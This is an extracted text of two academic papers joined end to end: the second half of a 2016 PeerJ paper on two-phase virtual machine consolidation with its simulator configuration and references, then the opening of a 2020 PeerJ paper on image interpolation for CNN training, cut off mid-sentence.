{P}, then apply greedy heuristics for anti- colocation and colocation to select a concrete set of virtual machines c ∈ {C} NOTE: The sub-steps in 4 can be performed in such a way as to not generate invalid permutations and thereby reduce resource consumption at runtime. RESULTS To implement our algorithm, we began by outlining a small but efficient set of structures to encapsulate the state of a virtual machine based cloud datacenter. We implemented our software in the C programming language, using structs for objects representing the hard- ware machines and their physical limitations, as well as structs to represent the abstract virtual machines (something with a multidimensional size but no concrete identifier or Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 12/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 placement constraints attached). We also used a structure to represent equivalence sets, which were named lists of abstract VMs with aggregate resource requirements. In total, the source code was just under 2,000 lines of commented C code as determined by the Linux wc utility. Once the VM and host information has been loaded from the preference file that describes the cloud to be modeled, the algorithm proceeds by enumerating all of the viable permutations of a single instance type. For instance, with the MICRO sized equivalence group modeled after Amazon’s micro instance our enumeration of single- instance permutation would likely begin with the output as shown in Listing 2. Listing 2: Example singleton permutation construction. [(MICRO:1x1)-M::1 C::2 N::1 S::1 E::1] [(MICRO:1x2)-M::2 C::4 N::2 S::1 E::2] [(MICRO:1x3)-M::3 C::6 N::3 S::1 E::3] [...truncated for brevity ...] [(MICRO:1x48)-M::48 C::96 N::48 S::1 E::48] [(SMALL:2x1)-M::2 C::1 N::1 S::1 E::1] [(SMALL:2x2)-M::4 C::2 N::2 S::1 E::2] [...truncated for brevity ...] [(QXL:64x2)-M::128 C::52 N::2 S::1 E::2] The format is simply saying the singleton type is micro, the 1×N notation indicates the number of instances, and the M, C, N, S, and E values represent the size of each of the memory, CPU, network, the number of sets in this combination (always 1 in a singleton set), and the number of concrete VM elements making up the set. Note, for simplicity of explanation, the dimension weights have been simplified to small, integer values. The listing might further continue for some time depending on the maximum capacity of the largest host or the maximum number of MICRO VM instances before continuing on to the SMALL sized VMs. As an example of performance of our two-phased approach to solution generation for VM bin-packing, we performed a variety of experiments using a custom written virtual machine-based data center simulator. Our simulator is a Linux-based C program written to model various servers of varying physical capacities along the resource dimensions studied herein (NIC, RAM, CPU, etc...) along with virtual machines of varying sizes with per dimension resource over-constraint parameters and oversubscription detection/pre- vention on a per-resource basis. All simulator development and experimental validation was performed on IBM R© Blade Center blades, each with 24-core CPUs and 94 GB RAM and later runs were repeated, on a 2014 Macbook Pro with 16 GB RAM. A simple XML configuration file specifying the virtual machines and hosts to be managed during the simulation governs the simulator. An example this configuration file is shown in the Appendix. The configuration file inputs include the per-resource over-constraint value. Overcommit is the oversubscription or over-allocation of resources to virtual machines Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 13/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 Table 1 Distribution of VMs across seven equivalence sets from a representative moderate-scale ex- periment. VM equivalence set name Concrete VM count Micro 30 Small 21 Medium 10 Large 10 XL 5 DXL 3 QXL 1 with respect to the physical hosts maximum allocation of a particular resource. As an example, setting MEMORY overcommit to 1 means a 1:1 ratio of allowed cumulative VM memory consumption to the hosts physical RAM. Similarly, setting a CPU overcommit value of 2 indicates scheduling up to two virtual CPU cores. Decimal or floating-point values greater than one are accepted as valid inputs. In addition the configuration file for the simulation requires information about the largest host capacity for each measured resource, used for short circuit analysis when constructing abstract equivalence sets. In other words, the simulator enforces that no abstract solution is generated that has a cumulative individual resource consumption that exceeds the largest available host resource availability, for that resource (considering the previously specified over- constraint values for that resource). Lastly, the configuration file shown in Appendix includes information about the number of concurrent inbound and concurrent outbound migrations allowed as well as a cumulative migration maximum threshold per host. These migration threshold values are used for final solution post-processing that determines an automated live-migration based rearrangement plan to achieve a packed solution from an arbitrary starting state (VM to host allocation). The approach uses our previously described approach based on the well studied A∗ search algorithm to determine an automated migration plan (Dow & Matthews, 2015). In a sample experiment that consisted of expanding a grouping of 79 concrete virtual machines as allocated according to Table 1, we generated 4,375,850 valid assignment permutations during the expansion phase (converting starting sets into all sets) in just 8 s of wall clock time. A further 14 s of wall clock time was used to perform final result sorting. A larger scale experimental parameterization is shown in Table 2. During this exper- iment we performed a simulation of a large-scale cloud data center with 7,850 VMs. In this larger scale experiment, there were 174 starting sets generated, to ultimately create 13,465,212 permutations, taking just over 28 s to compute. A further 60 s of wall clock time were required to sort the final output for concrete assignment. Sorting optimizations were not investigated, though they contributed more than 68% of our overall solution runtime. Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 14/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 Table 2 Distribution of VMs across seven equivalence sets from a representative large-scale experi- ment. VM equivalence set name Concrete VM count Micro 2,000 Small 2,000 Medium 2,000 Large 1,000 XL 500 DXL 250 QXL 100 In both experiments, we chose a distribution more heavily weighted towards the virtual machine sizes that the author has encountered during many years of professional and academic creation of VMs for cloud computing. Based on the author’s own practical experience in corporate VM creation and management for over a decade, it is apparent that many virtual machines begin their existence as a proof-of-concept system, generally sized as small as possible thus many are simply sized small at creation time. Further, we chose this size skew because virtual machines that require high levels of resources such as RAM or CPU are often selected for migration to dedicated hardware (often as the result of latency or performance reasons). Likewise, we argue that virtual machine-based data center operators, do not tend to create data centers consisting only of massively over- configured hosts. Thus, our experiments were targeted along a set of experiments fitting with our own empirical observations of cloud data centers. We should note however that our simulator does not stipulate any requirements on the number of VMs simulate or the nominal host capacities represented, thus more extreme simulations can indeed be performed. An example of the configuration file used to perform the experiments can be seen in Appendix. This configuration file format has proven to be expressive enough to run a variety of simulations during the course of this research. Our approach is unique in that it is based on an algorithm with complexity and runtime growth governed by the number of hosts and VMs, but substantially mitigated using an intermediate partial solution that is governed by the number of distinct group- ings of equivalent sized virtual machines (the classifications of virtual machine types) used in the system. While this algorithm may indeed break down for exceedingly large numbers of hosts (perhaps 500 or 1,000 hosts), we maintain that our goals are for the autonomous management of small to medium sized data centers that we consider to be well in the operational range of our solution. We have not simulated data centers beyond the maximum configuration reported here. This is in part because there will always be some degree of reservation regarding our use of simulation software rather than real data center hardware, rendering further experimentation subject to those same criticisms. We submit that VM management research should not be the bastion of private industry researchers with privileged access to that exorbitantly expensive class of hardware and production virtual machines and did what we could with the resources Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 15/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 available to us. Secondly, we limited the reach of our simulations because we have no empirical data sets for sizing the virtual machine distribution across a data center that size beyond those that we reported. Unsurprisingly, various cloud virtual machine providers rejected a plurality of requests for that sort of information. Not only has targeting this class of data center proved to be computationally tractable from a fully autonomous management perspective, but this class of data center are those that are much less likely to opt for exorbitant hardware capital expense needed to maintain performance while achieving consolidation (i.e., they want to consolidate to save money, and are generally less equipped with operational staff to manually check each migration operation if using live migration based consolidation. Effectively, this class of user and data center are the users who need a lightweight, autonomous solution the most. Formal comparisons to other VM-based cloud management systems are difficult in this type of research because this work was simulated while other published results may be run on other proprietary simulators or on real hardware. Additionally, it is notable that systems that perform bin packing of VMs do not generally open source or otherwise license their source code for no cost, and thus requiring black box reimplementation of described algorithms in order to perform meaningful comparisons. Even under clean room implementation cases, one is never sure if the original authors used tweaks or modifications etc., which would render a clean room implementation comparison meaningless. With respect to published values of VM’s packed as a function of time taken to perform the packing, we present our results as compared to those of Ferdaus et al. (2014) in their work using an Ant Colony Optimization based on vector algebra. Their experiments were performed on a smaller scale but roughly comparable server with respect to single core CPU speed. Our approach is not threaded, and we were unable to determine from a careful reading of their paper if their solution was. Their work is presented, similarly to our own, by using simulation. While they solve bin packing in a completely different approach to ours, they find their results favorable when compared to approaches like genetic algorithms. However, this improvement upon, or parity with their work can be considered a reasonable benchmark of success based on the literature. Their results extrapolated from their Fig. 2 along with their surrounding text would at first glance appear much better than our own. We readily admit that our solution seemingly performs much worse for small-scale experiments as described in our Table 1. As evidence of this, consider that our own packing solution for 78 virtual machines took 22 s in total while their comparable results reportedly took close to 0 s to compute. Their results are surely impressive for these small cases! However, it is our opinion that for these small cases of managed VMs, either of our algorithms might be suitable for effectively continuous online application. However, their largest scale result includes only 2,000 virtual machines and took ‘‘around 25 s on average.’’ In contrast, our largest simulation results involved 7,850 VMs and completed in 88 s. The only viable way to compare our results is to extrap- olate by optimistically assuming their results scale linearly in the number of VMs (which Ferdaus et al. explicitly admit is not the case stating ‘‘it is observed that computation time increases non-linearly with the number of VMs with small gradient’’). Using this Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 16/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 optimistic extrapolation, we paint their work in the best possible light and attempt to perform a meaningful comparison to our own work. If we assume their results suggest a management rate of 80 VMs/sec (derived from their published values reporting 2,000 VMs managed in 25 s) their algorithm on a 7,850 VM problem set would yield around 98 s run time that would hypothetically, but optimistically, exceed our own by 11% (or 18 s). While these numbers do not provide conclusive superiority of one technique over the other, they do seem comparable. Their analysis includes remarks that their results perform better than FFD based approaches, and a sizeable portion of our concrete assignment computation is based on a type of FFD derived technique which may explain much of their performance benefit especially in the scenarios with a small number of managed VMs. In addition, we submit that their solution only considers, ‘‘CPU, memory, and network I/O as relevant server resources in the context of VM consolidation’’ while ours considers CPU, memory, aggregate network I/O as well as cumulative network read I/O and cumulative network write I/O as well as network read/write/aggregate I/O. In addition we support preferential colocation and anti-colocation constraints that their solution does not handle at present. In summation of this section, our work performs comparably when extrapolating to the results of Ferdaus et al. (2014) in as favorable a means as possible while our reported results handled more resource dimensions, and included arguably necessary resources like colocation and anti-colocation for viable pro- duction systems. Lastly our work may be seen as preferable for production deployment based on the deterministic nature of our solution while the approach taken by Ferdaus et al. is probabilistic. We conclude our comparative analysis to other known works in the field by comparing our work to a recent paper from Hwang & Pedram (2013). While they also take a hierar- chical approach to virtual machine consolidation, using simulation for their published results, we note the following differences between our respective works. First, Hwang and Pedram decompose the problem in a slightly different way, opting for decomposition with a global manager that places VMs into clusters or functional groups, along with a local manager that assigns VMs to hosts within a given cluster. Our highest-level hierarchy is grouping VMs not based on cluster functionality but rather on their instance type or equivalence set. The second major difference of note is that their approach is heuristic in nature and appears to be based on a modified FFD algorithm that considers an aggregate of the free resources available as the term for greedy selection. Our work is hierarchical in that once a generic instance-type allocation has been prescribed, the concrete assignment phase hierarchically uses a type of FFD that descends through an a priori ordered list of resource dimensions and colocation/anti-colocation criteria to be used as tie-breakers for greedy selection. Thus, the FFD greedy selection criterion hierarchy is only used as needed. Their work seemingly does not consider colocation or anti-colocation considerations. Comparing to their results, we can rely on the single published reference of concrete runtimes, Fig. 9 in their work. Note the remaining figures they have included are presented as normalized runtimes for comparative purposes. Through email correspondence, the author of this work has confirmed the label in their Fig. 9 is incorrectly identified with a label of ‘‘seconds,’’ when it should in fact be labeled Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 17/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 ‘‘microseconds’’. Referring concretely to their Fig. 9, the best-case run time for packing management of 2,000 VMs is∼0.6∗107 microseconds (6 s) using a window size of 0. Their worst case published run time with a window size for the management of 2,000 VMs is 22 s (0.4 min). As you will recall from earlier in this section, our solution for a VM packing problem that was four times as large (8,000 VMs) took under two minutes. Once more we extrapolate using an optimistic linear extrapolation to a problem size of 4× and we estimate optimistically that Pedram and Hwan’s solution for a comparable problem size would take 24 s in the best case. It is is evident that a linear extrapolation is generous for comparative purposes as their results show a decidedly non-linear run- time increase covering 500, 1,000, 1,500, and 2,000 VM cases varied across each of their sliding window size selections. In their worst-case results (sliding window size of 60) using the same optimistic 4× extrapolation, we optimistically conclude an estimated lower- bound runtime would be approximately 88 s (which is, coincidentally, our empirically measured value for 7,850 VM problem set). We conclude that our algorithm performs slower than Pedram and Hwang’s best-case published solution when extrapolated optimistically for the∼8,000 VM problem size, but performs comparably to their worst- case solution when extrapolating though our solution considers location constraints that theirs does not. Accounting for generous extrapolations, we expect our solution would perform comparably, if not better, in practice for larger problem sizes while accounting for colocation and anti-colocation that their solution seemingly does not handle. CONCLUSIONS AND NEXT STEPS Our results show that decomposing the problem of virtual machine consolidation in cloud computing data centers into an abstract solution phase and a concrete fulfillment stage is advantageous in that it is easy to implement, allows satisfaction of multiple resource constraints, provides an easy means for implementing oversubscription sup- port, as well enabling a straightforward approach to colocation and anti-colocation requirements with very reasonable runtimes (under 90 s) for moderate numbers of virtual machines (7,850 VMs). In this way we can make use of observations data, if available, during the second phase of concrete assignment to improve placement decisions. These results compare favorably to the published literature from Ferdaus et al. as well as the work of Hwang and Pedram. However we tender these comparisons loosely, given the different motivations of the work, as well as the different problem set sizes used in the various publications and the requisite need to extrapolate in our effort for meaningful comparison. Further, it is apparent that our ongoing work should investigate potential sorting optimization to ameliorate the sorting activity that dominated our runtime profile. While the work of Roytman et al. (2013) demonstrated one means for performance characterization of potential consolidation impacts by using a staging area for new virtual machines, our research group believes that online detection of poor placement or colocation decisions should be a separate process architecturally. Furthermore, we believe the process of VM placement will eventually move to a fully dynamic and continuous Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 18/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 system that operates at the data center scale. Live-guest migration and fast networking technologies are beginning to show the promise of extremely short and non-disruptive live-migrations for even large-scale enterprise sized virtual machines. We are therefore working on an on-line, machine-learning-based (Dow, 2015) system to perform the task of detecting poor colocation decisions as a remedial effort for continuous cloud-scale VM rebalancing. We believe this work will complement the rapid consolidation planning implementation we have outlined here. It is our assertion that evidence-based VM continuous placement adjustment decisions will become the nominal operational reality for IaaS virtual machine clouds. The desire to pack VM’s expediently stems from implications regarding server power consumption in heterogeneous compute clouds. Fan, Weber & Barroso (2007), describe the covariant relationship between CPU usage and server power consumption as a linear relationship between power consumption of the server and the increase of CPU utilization. The range of this covariance extends from virtually idle through fully utilized states. P(u)=Pidle+(Pbusy−Pidle)∗u. (4) Equation (4) shows a linear model of power estimation based on CPU and idle power consumption. In Eq. (4), P is the estimated power consumption, while Pidle is the power consumption of an idle server, and with Pbusy as the power consumption of a fully utilized server. The value u is the instantaneous present CPU utilization of the host. Their work demonstrates that using this simple linear model, one can estimate the future power consumption of a server with error below 5%. They further proposed empirical, nonlinear, model is as shown in Eq. (5): P(u)=Pidle+(Pbusy−Pidle)(2u−u r). (5) Equation (5) shows an improved empirical model of power estimation based on cal- ibration experimentation. In Eq. (5), the parameter r is an experimentally obtained calibration parameter that minimizes the square error for the given class of host hardware. To use this formula, each class of host hardware must undergo a set of calibration experiments to generate the value of r that tunes the model. Their work, which spans thousands of nodes under different types of workloads, demonstrates a prediction error below 1% for a tuned empirical model. Using the results from Fan et al., it may be possible to treat hosts as equivalent resources in the same fashion as virtual machines are considered equivalent in this work. It is interesting to note that the previously mentioned work of Ferdaus et al. also uses the same general formulation for modeling power consumption in their Fig. 9 as shown above. This lends some degree of consensus to the adoption of this relatively straightforward approach for modeling power consumption of virtual machines. The approach envisioned makes the assumption that one could use the ‘‘smallest’’ hardware resource capacity vector from a set of hosts that have been arbitrarily clustered, perhaps through K-means or similar clustering approaches) by their power consumption Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 19/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 estimation formulas (Eqs. (4) and (5) in this work). This work seems a logical follow on and a reasonable next step to investigate. APPENDIX: SIMULATION CONFIGURATION FILE HARDWARE # The total number of physical host servers to be modeled MAX_SIMULATED_SERVERS=255 #The largest server RAM allocation present in the cloud (Largest server ram in MB) MAX_SERVER_RAM_SIZE=524288 #The largest smallest RAM allocation present in the cloud (Smallest server ram in MB) MIN_SERVER_RAM_SIZE=128 # The largest server CPU allocation present in the cloud (Number of hardware cores) MAX_SERVER_CPU_SIZE=124 #The largest smallest RAM allocation present in the cloud (Smallest server ram in MB) MIN_SERVER_CPU_SIZE=1 # The largest server NET allocation present in the cloud (in GB/sec) MAX_SERVER_NET_SIZE=10 # The largest server NET RX allocation present in the cloud (in GB/sec) MAX_SERVER_NET_RX_SIZE=10 # The largest server NET TX allocation present in the cloud (in GB/sec) MAX_SERVER_NET_TX_SIZE=10 # The largest server IO allocation present in the cloud (in GB/sec) MAX_SERVER_IO_SIZE=10 # The largest server IO READ allocation present in the cloud (in GB/sec) MAX_SERVER_IO_READ_SIZE=10 # The largest server IO WRITE allocation present in the cloud (in GB/sec) MAX_SERVER_IO_WRITE_SIZE=10 OVERCOMMIT # Overcommit is the oversubscription or overallocation of resources to virtual machines # with respect to the physical hosts maximum allocation of a particular resource. # Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 20/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 # As an example, setting MEMORY overcommit to 1 means a 1:1 ratio of allowed cumulative # vm memory consumption to the hosts physical ram. # # Setting a CPU overcommit value of 2 indicates scheduling up to 2 virtual cpu cores # per single physical cpu core on the host. # # NOTE: Values should always be 1 or greater... MEM_OVERCOMMIT_RATIO=1 CPU_OVERCOMMIT_RATIO=1 NET_OVERCOMMIT_RATIO=1 NET_RX_OVERCOMMIT_RATIO=1 NET_TX_OVERCOMMIT_RATIO=1 IO_OVERCOMMIT_RATIO=1 IO_READ_OVERCOMMIT_RATIO=1 IO_WRITE_OVERCOMMIT_RATIO=1 VIRTUAL MACHINES # The number of MICRO Sized Virtual Machines MICRO=30 # The number of SMALL Sized Virtual Machines SMALL=20 # The number of MEDIUM Sized Virtual Machines MEDIUM=10 # The number of LARGE Sized Virtual Machines LARGE=10 # The number of EXTRA LARGE Sized Virtual Machines XL=5 # The number of DOUBLE EXTRA LARGE Sized Virtual Machines DXL=3 # The number of QUADRUPLE EXTRA LARGE Sized Virtual Machines QXL=1 MIGRATION PLANS # The maximum possible inbound migrations per host (for bandwidth limiting or cpu concerns with parallel migrations) Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 21/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.47 MAX_CONCURRENT_INBOUND_MIGRATIONS_PER_HOST=2 # The maximum possible outbound migrations per host # (for bandwidth limiting or cpu concerns with parallel migrations) MAX_CONCURRENT_OUTBOUND_MIGRATIONS_PER_HOST=2 # The maximum possible cumulative inbound and outbound migrations per host # (for situations where the above alone will not tell the whole story of hypervisor impact) MAX_CONCURRENT_OVERALL_MIGRATIONS_PER_HOST=3 ADDITIONAL INFORMATION AND DECLARATIONS Funding The author received no funding for this work. Competing Interests Eli M. Dow is an employee of IBM Research. Author Contributions • Eli M. Dow conceived and designed the experiments, performed the experiments, analyzed the data, contributed materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Research performed in support of this publication did not generate appreciable or generally useful raw data beyond the comparative summary statistics reported herein. REFERENCES Campegiani P. 2009. A genetic algorithm to solve the virtual machines resources allo- cation problem in multi-tier distributed systems. In: Second international workshop on virtualization performance: analysis, characterization, and tools (VPACT 2009). Available at http://www.paolocampegiani.it/vpact.pdf . Campegiani P, Lo Presti F. 2009. A general model for virtual machines resources allocation in multi-tier distributed systems. In: Autonomic and autonomous systems, 2009. ICAS’09. Piscataway: IEEE, 162–167. Dow EM. 2015. Inciting cloud virtual machine reallocation with supervised machine learning and time series forecasts. In: Proceedings of the enterprise compute conference (ECC). Available at https://ecc.marist.edu/conf2015/pres/DowIncite-Presentation- ECC2015.pdf . Dow EM, Matthews N. 2015. Virtual machine migration plan generation through A∗ search. In: Cloud networking (CloudNet), 2015 IEEE 4th international conference on cloud networking. Piscataway: IEEE, 71–73. Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 22/24 https://peerj.com http://www.paolocampegiani.it/vpact.pdf https://ecc.marist.edu/conf2015/pres/DowIncite-Presentation-ECC2015.pdf https://ecc.marist.edu/conf2015/pres/DowIncite-Presentation-ECC2015.pdf http://dx.doi.org/10.7717/peerj-cs.47 Fan X, Weber W, Barroso LA. 2007. Power provisioning for a warehouse-sized com- puter. In: Proceedings of the 34th annual international symposium on Computer architecture. New York: ACM, 13–23. Ferdaus MH, Murshed M, Calheiros RN, Buyya R. 2014. Virtual machine consolidation in cloud data centers using ACO metaheuristic. In: Euro-par parallel processing. New York: Springer, 306–317. Gandhi A, Harchol-Balter M, Das R, Lefurgy C. 2009. Optimal power allocation in server farms. In: Proceedings of ACM SIGMETRICS. Available at http://www3.cs. stonybrook.edu/~anshul/sigmetrics_2009_tech.pdf . Greenberg A, Hamilton J, Maltz DA, Patel P. 2009. The cost of a cloud: research problems in data center networks. ACM SIGCOMM Computer Communication Review 39(1):68–73 DOI 10.1145/1496091.1496103. Gu J, Hu J, Zhao T, Sun G. 2012. A new resource scheduling strategy based on genetic algorithm in cloud computing environment. Journal of Computers 7(1):42–52 DOI 10.4304/jcp.7.1.42-52. Hwang I, Pedram M. 2013. Hierarchical virtual machine consolidation in a cloud computing system. In: Proceedings of the 2013 IEEE sixth international conference on cloud computing (CLOUD’13). Piscataway: IEEE Computer Society, 196–203. Isci C, Liu J, Abali B, Kephart JO, Kouloheris J. 2011. Improving server utilization using fast virtual machine migration. IBM Journal of Research and Development 55(6):365–376. Jiang Y, Shen X, Chen J, Tripathi T. 2008. Analysis and approximation of optimal co- scheduling on chip multiprocessors. In: Proceedings of the seventeenth international conference on parallel architectures and compilation techniques, 220–229. Jiang Y, Tian K, Shen X. 2010. Combining locality analysis with online proactive job co- scheduling in chip multiprocessors. In: Proceedings of the international conference on high-performance embedded architectures and compilers, 6–8. Johnson DS, Demers A, Ullman JD, Garey MR, Graham RL. 1974. Worst-case perfor- mance bounds for simple one-dimensional packing algorithms. SIAM Journal on Computing 3(4):299–325 DOI 10.1137/0203025. Kohavi R, Henne RM, Sommerfield D. 2007. Practical guide to controlled experiments on the web: listen to your customers not to the hippo. In: Proceedings of the thirteenth annual ACM SIGKDD international conference on knowledge discovery and data mining. New York: ACM, 959–967. Lynar TM, Herbert RD, Simon S. 2009. Auction resource allocation mechanisms in grids of heterogeneous computers. WSEAS Transactions on Computers 8(10):1671–1680. Mars J, Tang L, Hundt R, Skadron K, Soffa ML. 2011. Bubble-up: increasing utilization in modern warehouse scale computers via sensible co-locations. In: Proceedings of the forty-fourth annual IEEE/ACM international symposium on microarchitecture (Micro44). New York: ACM. Narayanan D, Donnelly A, Rowstron A. 2008. Write offloading: practical power management for enterprise storage. In: Proceedings of the file and storage technologies conference, San Jose, CA, 253–267. Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 23/24 https://peerj.com http://www3.cs.stonybrook.edu/~anshul/sigmetrics_2009_tech.pdf http://www3.cs.stonybrook.edu/~anshul/sigmetrics_2009_tech.pdf http://dx.doi.org/10.1145/1496091.1496103 http://dx.doi.org/10.4304/jcp.7.1.42-52 http://dx.doi.org/10.4304/jcp.7.1.42-52 http://dx.doi.org/10.1137/0203025 http://dx.doi.org/10.7717/peerj-cs.47 Panigrahy R, Talwar K, Uyeda L, Wieder U. 2011. Heuristics for vector binpacking. Microsoft Research Technical Report. Redmond, Microsoft. Available at http: //research.microsoft.com/apps/pubs/default.aspx?id=147927. Roytman A, Kansal A, Govindan S, Liu J, Nath S. 2013. PACMan: performance aware virtual machine consolidation. In: Proceedings of the 10th international conference on autonomic computing (ICAC), 83–94. Available at https://www.usenix.org/conference/ icac13/technical-sessions/presentation/roytman. Schurman E, Brutlag J. 2009. Performance related changes and their user impact. In: O’REILLY: web performance and operations conference (velocity). Tian K, Jiang Y, Shen X. 2009. A study on optimally co-scheduling jobs of different lengths on chip multiprocessors. In: Proceedings of the ACM international conference on computing frontiers. New York: ACM. Tulloch M. 2010. Achieve higher consolidation ratios using dynamic memory. BizTech Article. Available at http://www.biztechmagazine.com/article/2010/12/achieve-higher- consolidation-ratios-using-dynamic-memory. United States Environmental Protection Agency. 2007. Report to congress on server and data center energy efficiency public law 109-431. Technical Report, EPA ENERGY STAR Program. Washington, D.C., EPA. VMware, Inc. 2006. The role of memory in VMware ESX server 3. Palo Alto: VMware, Introduction section, paragraph 1, page 1. Available at https://www.vmware.com/pdf/ esx3_memory.pdf . Zhang D, Ehsan M, Ferdman M, Sion R. 2014. DIMMer: a case for turning off DIMMs in clouds. In: ACM symposium on cloud computing (SOCC). New York: ACM. Dow (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.47 24/24 https://peerj.com http://research.microsoft.com/apps/pubs/default.aspx?id=147927 http://research.microsoft.com/apps/pubs/default.aspx?id=147927 https://www.usenix.org/conference/icac13/technical-sessions/presentation/roytman https://www.usenix.org/conference/icac13/technical-sessions/presentation/roytman http://www.biztechmagazine.com/article/2010/12/achieve-higher-consolidation-ratios-using-dynamic-memory http://www.biztechmagazine.com/article/2010/12/achieve-higher-consolidation-ratios-using-dynamic-memory https://www.vmware.com/pdf/esx3_memory.pdf https://www.vmware.com/pdf/esx3_memory.pdf http://dx.doi.org/10.7717/peerj-cs.47 work_yk2gyqjyvfawrgxcooxtlutl2u ---- Submitted 22 July 2020 Accepted 14 October 2020 Published 16 November 2020 Corresponding author Daisuke Hirahara, ffieldai@gmail.com Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 11 DOI 10.7717/peerj-cs.312 Copyright 2020 Hirahara et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Effects of data count and image scaling on Deep Learning training Daisuke Hirahara1, Eichi Takaya2, Taro Takahara3 and Takuya Ueda4 1 Department of AI Research Lab, Harada Academy, Kagoshima, Kagoshima, Japan 2 School of Science for Open and Environmental Systems, Graduate School of Science and Technology, Keio University, Yokohama, Kanagawa, Japan 3 Department of Biological Engineering, School of Engineering, Tokai University, Isehara, Kanagawa, Japan 4 Department of Clinical Imaging, Graduate School of Medicine, Tohoku University, Sendai, Japan ABSTRACT Background. Deep learning using convolutional neural networks (CNN) has achieved significant results in various fields that use images. Deep learning can automatically extract features from data, and CNN extracts image features by convolution processing. We assumed that increasing the image size using interpolation methods would result in an effective feature extraction. To investigate how interpolation methods change as the number of data increases, we examined and compared the effectiveness of data augmentation by inversion or rotation with image augmentation by interpolation when the image data for training were small. Further, we clarified whether image augmentation by interpolation was useful for CNN training. To examine the usefulness of interpolation methods in medical images, we used a Gender01 data set, which is a sex classification data set, on chest radiographs. For comparison of image enlargement using an interpolation method with data augmentation by inversion and rotation, we examined the results of two- and four-fold enlargement using a Bilinear method. Results. The average classification accuracy improved by expanding the image size using the interpolation method. The biggest improvement was noted when the number of training data was 100, and the average classification accuracy of the training model with the original data was 0.563. However, upon increasing the image size by four times using the interpolation method, the average classification accuracy significantly improved to 0.715. Compared with the data augmentation by inversion and rotation, the model trained using the Bilinear method showed an improvement in the average classification accuracy by 0.095 with 100 training data and 0.015 with 50,000 training data. Comparisons of the average classification accuracy of the chest X-ray images showed a stable and high-average classification accuracy using the interpolation method. Conclusion. Training the CNN by increasing the image size using the interpolation method is a useful method. In the future, we aim to conduct additional verifications using various medical images to further clarify the reason why image size is important. Subjects Artificial Intelligence, Data Mining and Machine Learning, Data Science Keywords Image scaling, Nearest, Bilinear, Hamming, Bicubic, Lanczos, Medical image, Deep learning, Fashion-MNIST, Interpolation How to cite this article Hirahara D, Takaya E, Takahara T, Ueda T. 2020. Effects of data count and image scaling on Deep Learning train- ing. PeerJ Comput. Sci. 6:e312 http://doi.org/10.7717/peerj-cs.312 https://peerj.com/computer-science mailto:ffieldai@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.312 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.312 INTRODUCTION A convolutional neural network (CNN) proposed by researchers at the University of Toronto at the 2012 ImageNet Large Scale Visual Recognition Challenge (Hijazi, Kumar & Rowen, 2015) had significant impact on society when it achieved an approximately 10% improvement in error rate compared to previous methods. This technological development has made image classification widely known for its effectiveness, and its applications in the medical field are rapidly advancing (Zhou et al., 2017; Kyono, Gilbert & Van der Schaar, 2020; Poplin et al., 2018), e.g., classification of computed tomography images and mammographs, along with the prediction of cardiovascular risk from retinal fundus photographs. By training a CNN using a large volume image data, identification can be achieved at high accuracy. However, in the medical field though, large volumes of image data are not always available. As a result, when the amount of training data is limited or only small images are available, CNNs cannot be trained as designed; thus, they cannot be used to solve problems. Generally, if the amount of data is limited when training a machine learning model for image identification, a data augmentation method is employed to mirror or rotate the available image data. Various data augmentation methods have been proposed as of June 2020. For example, mixup (Zhang et al., 2018) performs augmentation by linearly complementing labels and data to create new data, Augmix (Hendrycks et al., 2020) realizes data augmentation by convexly joining multiple randomly sampled operations and their compositions without deviating from the original data while maintaining diversity, and random erasing data augmentation (Zhong et al., 2020) masks random, partial rectangular areas of an image to generate training data. These methods are effective for image classification, object detection, and person identification tasks; however, they are less effective for medical images because new data are generated and mask processing is performed. This is due to the fact that if the medical image is randomly cropped or masked, the lesion is hidden and frequently disappears in the true image. Images of the human body have structures that originally have a fixed position of existence. For example, the liver is always on the right side of the body, and the heart is always on the left side. Therefore, even recent data augmentation methods (mixup, Augmix, and random erasing data augmentation) with right-to-left inversion or rotation may not improve the robustness of analysis for the human body images. It’s worth noting that several studies are currently investigating high-accuracy identification with a small amount of data using various methods, e.g., transfer learning and multi-scale CNNs (Bakkouri & Afdel, 2019; Samanta et al., 2020). In these methods, data augmentation is performed by degrading the image with a fixed number of pixels or by degrading the high-resolution image. However, studies using medical images often require the use of only a portion of the image. This can happen when we use CT images in the study for the lymph node. Although the original resolution of CT is enough (512×512), the data size around the lymph nodes can only be a few tens of pixels, thereby causing low resolution. In addition, when Hirahara et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.312 2/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.312 Figure 1 CNN structure. Fh, input height, Fw, input width, Oh, output height, Ow, output width, 